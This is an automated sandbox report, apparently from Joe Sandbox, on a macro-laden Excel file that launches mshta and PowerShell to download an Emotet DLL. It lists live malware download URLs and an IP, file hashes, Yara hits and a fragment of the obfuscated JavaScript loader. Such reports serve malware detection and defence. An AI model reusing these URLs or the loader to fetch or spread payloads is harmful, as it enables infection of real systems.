http://maxtdeveloper.com/okw9yx/Gc28ZX/	100%	Avira URL Cloud	malware
http://it-o.biz/bitrix/xoDdDe/	100%	Avira URL Cloud	malware
https://gudangtasorichina.com/wp-content/GG01c/	100%	Avira URL Cloud	malware
http://totalplaytuxtla.com/sitio/DgktL3zd/	100%	Avira URL Cloud	malware
http://activetraining.sytes.net/libraries/8s/	100%	Avira URL Cloud	malware
http://91.240.118.172/gg/ff/fe.p	0%	Avira URL Cloud	safe
http://gardeningfilm.com/wp-cont	100%	Avira URL Cloud	malware
http://jurnalpjf.lan.go.id/assets/iM/PE3	100%	Avira URL Cloud	malware
http://91.240.118.172/gg/ff/fe.htmlB	0%	Avira URL Cloud	safe
http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3	100%	Avira URL Cloud	malware
http://bimesarayenovin.ir/wp-admin/G1pYGL/	100%	Avira URL Cloud	malware
http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3	100%	Avira URL Cloud	malware
http://91.240.118.172/gg/ff/fe.html	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
hostfeeling.com	164.90.147.135	true	false		unknown
jurnalpjf.lan.go.id	103.206.244.105	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://91.240.118.172/gg/ff/fe.png	true	Avira URL Cloud: malware	unknown
http://jurnalpjf.lan.go.id/assets/iM/	true	Avira URL Cloud: malware	unknown
http://91.240.118.172/gg/ff/fe.html	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://maxtdeveloper.com/okw9yx/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://gardeningfilm.com/wp-content/pcMVUYDQ3q/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://it-o.biz/bitrix/xoDdDe/PE3	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.inablr.com/elenctic/f	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://totalplaytuxtla.com/sitio/DgktL3zd/PE3	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://hostfeeling.com/wp-admin/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://property-eg.com/mlzkir/97v/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.11	powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: safe	low
http://91.240.118.172/gg/ff/fe.pngPE3	powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://jurnalpjf.lan.go.id/asset	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://bimesarayenovin.ir/wp-adm	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html	mshta.exe, 00000004.00000003.411930557.0000000002855000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://hostfeeling.com	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://daisy.sukoburu-secure.com	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://it-o.biz/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.240.118.172/gg/ff/fe.htmlr	mshta.exe, 00000004.00000002.436317655.000000000033E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://activetraining.sytes.net/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://gudangtasorichina.com/wp-content/GG01c/PE3	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://gudangtasorichina.com/wp	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://daisy.suk	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.240.118.172/gg/ff/fe.htmlngs	mshta.exe, 00000004.00000002.436317655.000000000033E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://91.240.118.172/gg/ff/fe.htmlmshta	mshta.exe, 00000004.00000002.436281987.0000000000300000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://91.240.118.172/gg/ff/fe.htmlWinSta0	mshta.exe, 00000004.00000002.436281987.0000000000300000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://property-eg.com/mlzkir/97v/PE3	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://daisy.sukoburu-secure.com/8plks/v8lyZTe/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://property-eg.com/mlzkir/9	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.172	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://jurnalpjf.lan.go.id	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.protware.com	mshta.exe, 00000004.00000003.410185425.000000000310D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436631636.00000000030E2000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://activetraining.sytes.net/libraries/8s/PE3	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.172/gg/ff/fe.htmlfunction	mshta.exe, 00000004.00000003.412420079.000000000285D000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://totalplaytuxtla.com/sitio	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://maxtdeveloper.com/okw9yx/Gc28ZX/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://it-o.biz/bitrix/xoDdDe/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	powershell.exe, 00000006.00000002.661371984.00000000000C0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gudangtasorichina.com/wp-content/GG01c/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://totalplaytuxtla.com/sitio/DgktL3zd/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://activetraining.sytes.net/libraries/8s/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.172/gg/ff/fe.p	powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://gardeningfilm.com/wp-cont	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://jurnalpjf.lan.go.id/assets/iM/PE3	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.172/gg/ff/fe.htmlB	imedpub_8.xls.0.dr	true	Avira URL Cloud: safe	unknown
http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://bimesarayenovin.ir/wp-admin/G1pYGL/	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3	powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
164.90.147.135	hostfeeling.com	United States	14061	DIGITALOCEAN-ASNUS	false
91.240.118.172	unknown	unknown	49453	GLOBALLAYERNL	true
103.206.244.105	jurnalpjf.lan.go.id	Indonesia	131111	CEPATNET-AS-IDPTMoraTelematikaIndonesiaID	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	562400
Start date:	28.01.2022
Start time:	20:57:39
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 56s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	imedpub_8.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLS@9/8@2/3
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Changed system and user locale, location and keyboard layout to English - United States Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
TCP Packets have been reduced to 100
Execution Graph export aborted for target mshta.exe, PID 2804 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 800 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:58:17	API Interceptor	60x Sleep call for process: mshta.exe modified
20:58:20	API Interceptor	443x Sleep call for process: powershell.exe modified

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	548864
Entropy (8bit):	6.9805129193387385
Encrypted:	false
SSDEEP:	12288:B2AavzUBPSczbeeTLjvWyMwWd3DYr6i64/:OUBPSczbeeTnvqZDWA
MD5:	0EA8275E9959D13E2DAE61B507BEFD0B
SHA1:	CBDBC5CC68469D500B9D2BEF0A5EFD7BCD2F9663
SHA-256:	3FD5FF9B3428C603D79CFDFB8C11C7AFCABE8F575B09BE5946BE4C413DAFC83B
SHA-512:	6ADB7CE585061A813765FED1A1800587A495D2060888B05CE98CA0CAE79400930479BF830D598EE236D6BC0B2D16F5F21034ED58921B66FE2715B00F79506788
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\JooSee.dll, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm

Download File

Process:	C:\Windows\System32\mshta.exe
File Type:	data
Category:	downloaded
Size (bytes):	11054
Entropy (8bit):	6.200485074224619
Encrypted:	false
SSDEEP:	192:aY5CkQ90FfYdjqQa2XdytMHsygv2nscEYD63lWAG7orUzAaENQaCBlm1Zhvkz29c:aY4kBBOjqQrXdHHsyg8sCr0UznQQasYS
MD5:	DD20B97330028BCB6BF98D97C47028D9
SHA1:	D58D97589A97FBD3B1216ED76C4918113F4B7B25
SHA-256:	4E945D89F45065FBA3B3318DD8CB3EFF9991CB6F8038168D221B862810E84D21
SHA-512:	AF4979B61257330E763B0C450575859D678F6950EF42783C87B2D9ED84130E4651CF58FBEF40E4C0BD3217B957A807337475F85C2610C24317C05DE98AC31A88
Malicious:	false
Reputation:	moderate, very likely benign file
IE Cache URL:	http://91.240.118.172/gg/ff/fe.html
Preview:	.......................................................................................................................................................................<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode\|\|document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')\|lI1('per');f9f76c\|=lII;zLP=location.protocol+'0FD';mY2KcI8HWQPA8=new Array();q52Li668M68pR=new Array();q52Li668M68pR[0]='%6D\170%38%38%33%34%34%41' ;mY2KcI8HWQPA8[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.<~W. .x~.~/.=."~=~?~A~C~E~G~I./.1.9~y~V~..l~f~h.e.a.d~g.s.c.r.i.p.t.>.e.v~6.(.u.n.e}..a.p.e.(.\'}..\\.1.6.2.%.2.0}

C:\Users\user\AppData\Local\Temp\32B4.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.1464700112623651
Encrypted:	false
SSDEEP:	3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
MD5:	72F5C05B7EA8DD6059BF59F50B22DF33
SHA1:	D5AF52E129E15E3A34772806F6C5FBF132E7408E
SHA-256:	1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
SHA-512:	6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
Malicious:	false
Reputation:	high, very likely benign file
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF3B12D0E9CF2F0062.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF9DFA6BFBFA953BEE.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	3.5189161831469296
Encrypted:	false
SSDEEP:	768:wvsk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIZNSEVLG:w0k3hbdlylKsgqopeJBWhZFGkE+cMLx3
MD5:	06A30014EFAE12913C829BE85DD271EC
SHA1:	D19ADB2B308E5BC2C3E102DA72B2C22ADAF7563D
SHA-256:	2ACF233FC4C70929CE7081E3F9C544AD26656E9AC8BC64B25AA9B0CCCABA05C9
SHA-512:	E8BBC35960CC00962E744169521B702DD3C0B35BC248D4E3968DDCA9585BF21D0B43169F34EED7DF06426B4995E61653F5DD0F882F6F058FB6A010D708B0D279
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5788999137578306
Encrypted:	false
SSDEEP:	96:chQC4MqHkqvsqvJCwozz8hQC4MqHkqvsEHyqvJCworhzKAYHhHQUVXEWlUV9A2:cmJLozz8mJfHnorhzKTKUVXELA2
MD5:	1DC801BAB39D408109341647BDCD7F14
SHA1:	61B8376E7F522ED6A12EA719A1CAAF6EB42F49D8
SHA-256:	B8819F4401917BECC49B77023CF3C55403473D86B6A8C8E26AE504615EE81997
SHA-512:	0CE91DCBAFC7E1FBBD93868C249FBB03AEE8EE32E2A2B744F98F53362A6D0443985D51B756367167E0ECB9BAD208F3865600DE100645FCFEABA15BC940375544
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S ....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X5Z6VJ3ODJ5VBJVEIRD5.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5788999137578306
Encrypted:	false
SSDEEP:	96:chQC4MqHkqvsqvJCwozz8hQC4MqHkqvsEHyqvJCworhzKAYHhHQUVXEWlUV9A2:cmJLozz8mJfHnorhzKTKUVXELA2
MD5:	1DC801BAB39D408109341647BDCD7F14
SHA1:	61B8376E7F522ED6A12EA719A1CAAF6EB42F49D8
SHA-256:	B8819F4401917BECC49B77023CF3C55403473D86B6A8C8E26AE504615EE81997
SHA-512:	0CE91DCBAFC7E1FBBD93868C249FBB03AEE8EE32E2A2B744F98F53362A6D0443985D51B756367167E0ECB9BAD208F3865600DE100645FCFEABA15BC940375544
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S ....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\Desktop\imedpub_8.xls

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
Category:	dropped
Size (bytes):	86528
Entropy (8bit):	7.100285491098866
Encrypted:	false
SSDEEP:	1536:g0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIzSEV2NnX4Ia3gg5W8IuD7PoHsP7e3F:g0k3hbdlylKsgqopeJBWhZFGkE+cMLxF
MD5:	9327C4424E99C81EA3EA275D76AB38F4
SHA1:	59129100286164B88FD2A2673E23A71D07687EE4
SHA-256:	F3CAA9710F8BF3AAC4E7C7584AD4023C00CCE6B06CEEBDF77C7B1CA2316248AC
SHA-512:	276FE9503E17018531220A06A0056B2620ACB782A07676B35966CF93E295E626AC103FC2ABB311F5ECC85BBE7F44FD543F700195C58CCBC408ED7AF527A2208C
Malicious:	true
Yara Hits:	Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\imedpub_8.xls, Author: John Lambert @JohnLaTwC Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\imedpub_8.xls, Author: Joe Security
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1.

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
Entropy (8bit):	7.086706619145403
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	imedpub_8.xls
File size:	86777
MD5:	e5e714cb6407688c4d57a5ac96c09047
SHA1:	8f46f78706d2530efb3e8b2fb843bf7baef60cab
SHA256:	a62bbd0c4dd80047a998ef3fe2670658ee890ffed8ad7775539967b665e2d001
SHA512:	022dba2ddcd4b4e7756899f08847cd8349e8b2bd91633fe257675648eb13a0af1c688fbb1e79a902c6e16b1574f3a9de32c094ed96d52861565d721ea4d702a1
SSDEEP:	1536:H0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIzSEV2NnX4Ia3gg5W8IuD7PoHsP7e3/:H0k3hbdlylKsgqopeJBWhZFGkE+cMLxz
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "imedpub_8.xls"

Indicators

Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary

Code Page:	1251
Author:	xXx
Last Saved By:	xXx
Create Time:	2022-01-27 23:41:00
Last Saved Time:	2022-01-28 06:31:03
Creating Application:	Microsoft Excel
Security:	0

Document Summary

Document Code Page:	1251
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.324918127833
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . R E E E E E E E E . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 ad 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.263079431268
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x X x . . . . . . . . . x X x . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . N . V . . . . @ . . . . - - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
